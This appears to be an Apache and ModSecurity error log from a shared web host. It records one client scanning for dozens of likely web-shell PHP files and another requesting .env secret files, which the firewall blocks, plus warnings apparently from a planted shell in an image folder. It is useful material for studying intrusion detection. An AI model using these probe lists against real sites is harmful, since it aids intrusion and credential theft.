[Mon May 11 12:22:54.908031 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/admin.php
[Mon May 11 12:22:55.076239 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/inputs.php
[Mon May 11 12:22:55.243380 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/file.php
[Mon May 11 12:22:55.413560 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/goods.php
[Mon May 11 12:22:55.580175 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/ms-edit.php
[Mon May 11 12:22:55.746934 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/simple.php
[Mon May 11 12:22:55.859572 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:54636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env.local.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/temp/.env.local.template"] [unique_id "agGt_2S6k_SCYd1AVZq5lgAAARE"]
[Mon May 11 12:22:55.863262 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:54636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/temp/.env.local.template"] [unique_id "agGt_2S6k_SCYd1AVZq5lgAAARE"]
[Mon May 11 12:22:55.952585 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/bgymj.php
[Mon May 11 12:22:56.286241 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/404.php
[Mon May 11 12:22:56.460045 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/file3.php
[Mon May 11 12:22:56.663234 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/wp-mail.php
[Mon May 11 12:22:56.830276 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/about.php
[Mon May 11 12:22:56.997254 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/wp.php
[Mon May 11 12:22:57.032842 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:54636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt_2S6k_SCYd1AVZq5lgAAARE"]
[Mon May 11 12:22:57.056952 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:54640] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env.local.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/temp/.env.local.template"] [unique_id "agGuAWS6k_SCYd1AVZq5lwAAAQ8"]
[Mon May 11 12:22:57.057299 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:54640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/temp/.env.local.template"] [unique_id "agGuAWS6k_SCYd1AVZq5lwAAAQ8"]
[Mon May 11 12:22:57.335743 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/adminfuns.php
[Mon May 11 12:22:57.502830 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/php8.php
[Mon May 11 12:22:57.669879 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/classwithtostring.php
[Mon May 11 12:22:57.836819 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/info.php
[Mon May 11 12:22:58.004183 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/ioxi-o.php
[Mon May 11 12:22:58.171177 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/011i.php
[Mon May 11 12:22:58.269133 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:54640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuAWS6k_SCYd1AVZq5lwAAAQ8"]
[Mon May 11 12:22:58.338078 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/edit.php
[Mon May 11 12:22:58.527453 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/sid3.php
[Mon May 11 12:22:58.694225 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/load.php
[Mon May 11 12:22:58.861105 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/166.php
[Mon May 11 12:22:59.037233 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/wp-mail.php
[Mon May 11 12:22:59.204256 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/leaf.php
[Mon May 11 12:22:59.371302 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/grsiuk.php
[Mon May 11 12:22:59.564667 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/8.php
[Mon May 11 12:22:59.731123 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/fs.php
[Mon May 11 12:22:59.897997 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/ws38.php
[Mon May 11 12:23:00.088932 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/a7.php
[Mon May 11 12:23:00.255901 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/classsmtps.php
[Mon May 11 12:23:00.422966 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/amax.php
[Mon May 11 12:23:00.590056 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/CDX1.php
[Mon May 11 12:23:00.756974 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/rip.php
[Mon May 11 12:23:00.923926 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/1.php
[Mon May 11 12:23:01.105659 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/chosen.php
[Mon May 11 12:23:01.272608 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/css.php
[Mon May 11 12:23:01.439724 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/php.php
[Mon May 11 12:23:01.633742 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/wp-Blogs.php
[Mon May 11 12:23:02.167808 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/ws83.php
[Mon May 11 12:23:02.334622 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/file61.php
[Mon May 11 12:23:02.501597 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/sadcut1.php
[Mon May 11 12:23:02.668584 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/y.php
[Mon May 11 12:23:02.835578 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/akcc.php
[Mon May 11 12:23:03.360151 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/term.php
PHP Warning:  filesize(): stat failed for /proc/227/task/227/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/227/task/227/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/227/task/227/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/227/task/227/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/227/task/227/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/227/task/227/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 12:23:03.527239 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/666.php
[Mon May 11 12:23:03.705217 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/7.php
[Mon May 11 12:23:03.872099 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/wp-config-sample.php
[Mon May 11 12:23:04.046468 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/log.php
[Mon May 11 12:23:04.213483 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/a5.php
[Mon May 11 12:23:04.385889 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/aa.php
[Mon May 11 12:23:04.552873 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/bolt.php
[Mon May 11 12:23:04.719665 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/x.php
[Mon May 11 12:23:04.886570 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/jga.php
[Mon May 11 12:23:05.053492 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/k.php
[Mon May 11 12:23:05.220520 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/vx.php
[Mon May 11 12:23:05.387487 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/ws77.php
[Mon May 11 12:23:05.554408 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/2.php
[Mon May 11 12:23:05.760247 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/abcd.php
[Mon May 11 12:23:06.094860 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/asd.php
[Mon May 11 12:23:06.262482 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/default.php
[Mon May 11 12:23:06.429451 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/gettest.php
[Mon May 11 12:23:06.596397 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/install.php
[Mon May 11 12:23:06.764333 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/tfm.php
[Mon May 11 12:23:06.930973 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/ws81.php
[Mon May 11 12:23:07.097836 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/222.php
[Mon May 11 12:23:07.269403 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/t.php
[Mon May 11 12:23:07.603342 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/6xBAm3vODE05BSzkJZRAws.php
[Mon May 11 12:23:07.770348 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/a.php
[Mon May 11 12:23:07.937275 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/a1.php
[Mon May 11 12:23:08.104459 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/onclickfuns.php
[Mon May 11 12:23:08.274968 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/w.php
[Mon May 11 12:23:08.776074 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/wp-good.php
[Mon May 11 12:23:08.943134 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/.info.php
[Mon May 11 12:23:09.109920 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/config.php
[Mon May 11 12:23:09.277014 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/item.php
[Mon May 11 12:23:09.464212 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/m.php
[Mon May 11 12:23:09.631118 2026] [:error] [pid 1254242:tid 1254246] [client 4.193.121.6:17418] File does not exist: /home/kfr/public_html/rh.php
[Mon May 11 12:23:39.570546 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:59108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.copy-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/test/.env.copy-old"] [unique_id "agGuK0Rdw2n9wv6Ai48TVgAAAJc"]
[Mon May 11 12:23:39.572007 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:59108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/test/.env.copy-old"] [unique_id "agGuK0Rdw2n9wv6Ai48TVgAAAJc"]
[Mon May 11 12:23:41.030565 2026] [security2:error] [pid 1254328:tid 1254352] [client 185.177.72.9:59108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuK0Rdw2n9wv6Ai48TVgAAAJc"]
[Mon May 11 12:23:41.057385 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:59124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env.copy-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/test/.env.copy-old"] [unique_id "agGuLRjZymfuKpjWXeiIYAAAANY"]
[Mon May 11 12:23:41.057804 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:59124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/test/.env.copy-old"] [unique_id "agGuLRjZymfuKpjWXeiIYAAAANY"]
[Mon May 11 12:23:42.514049 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:59124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuLRjZymfuKpjWXeiIYAAAANY"]
[Mon May 11 12:23:50.166710 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:63026] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /testing/.env.testing20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/testing/.env.testing20240101"] [unique_id "agGuNhjZymfuKpjWXeiIbgAAAMw"]
[Mon May 11 12:23:50.167264 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:63026] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/testing/.env.testing20240101"] [unique_id "agGuNhjZymfuKpjWXeiIbgAAAMw"]
[Mon May 11 12:23:51.501937 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:63026] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuNhjZymfuKpjWXeiIbgAAAMw"]
[Mon May 11 12:23:51.528372 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:63030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /testing/.env.testing20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/testing/.env.testing20240101"] [unique_id "agGuN5kIEwRJMyDaV55Z_gAAAVE"]
[Mon May 11 12:23:51.529175 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:63030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/testing/.env.testing20240101"] [unique_id "agGuN5kIEwRJMyDaV55Z_gAAAVE"]
[Mon May 11 12:23:52.751730 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:63030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuN5kIEwRJMyDaV55Z_gAAAVE"]
[Mon May 11 12:23:57.920179 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:25054] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.old2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/tests/.env.old2024"] [unique_id "agGuPURdw2n9wv6Ai48TbwAAAJM"]
[Mon May 11 12:23:57.922284 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:25054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/tests/.env.old2024"] [unique_id "agGuPURdw2n9wv6Ai48TbwAAAJM"]
[Mon May 11 12:23:59.091336 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:25054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGuPURdw2n9wv6Ai48TbwAAAJM"]
[Mon May 11 12:23:59.117390 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:25062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/.env.old2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/tests/.env.old2024"] [unique_id "agGuP2S6k_SCYd1AVZq51QAAAQo"]
